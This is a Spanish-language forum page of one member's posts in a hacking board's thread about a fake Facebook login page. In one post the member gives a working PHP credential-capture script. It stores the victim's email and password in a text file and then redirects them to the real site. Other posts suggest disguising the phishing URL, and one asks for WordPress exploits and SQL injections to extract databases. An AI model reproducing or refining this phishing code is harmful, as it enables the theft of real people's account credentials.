• Welcome to Test Foro de elhacker.net SMF 2.1.
 
Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - Bl1ttCeR

#1
Bugs y Exploits / Re: phishing fakebuuk
12 May 2012, 18:23 PM
Y si enmascaras el localhost con la url de la original... si tienes acceso a la maquina claro está para ello, aunque está más difícil sin acceso, lo digo por el tema de la url diferente.


PD: este post tiene casi 2700visitas y nadie ha dicho nada...
#2
Bugs y Exploits / Re: phishing fakebuuk
12 May 2012, 18:14 PM
Aquí os dejo una idea de write.php  ;D por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime.

Actualizo con un header fácilmente se le redirigiría, por cierto me he dado cuenta que después de sacar la web con Chrome por lo menos se me queda más pequeña que la real ajaajajaa se nota la diferencia, por otra parte lo de pasar los imputs a la real y hacer el submit es más complejo me da...


<?php
$email
="";
if (!empty(
$_REQUEST['email'])){
$email=$_REQUEST['email'];
}

$pass="";
if (!empty(
$_REQUEST['pass'])){
$pass=$_REQUEST['pass'];
}
 
//Luego sobrescribo el txt
 
$archivo="datos.txt";
 
$file=fopen($archivo,"a"); 
fwrite($file,$email.$pass);  

header('Location: http://www.facebook.com');

?>
#3
Bugs y Exploits / Re: phishing fakebuuk
12 May 2012, 17:21 PM
y donde esta el write.php del script capture pass, porque pusiste lo más sencillo que no tiene mayor complicación el script es lo importante creo yo. -.-)
#4
Buenas, quisiera saber si existen vulnerabilidades para última versión de Wordpress, exploits, sql injections, para poder sacar bases de datos.

A ver quien me puede explicar y enseñar un poco si es que existen que creo que si.

También me interesa saber como evitarlas.

Un saludo y muchas gracias de antemano.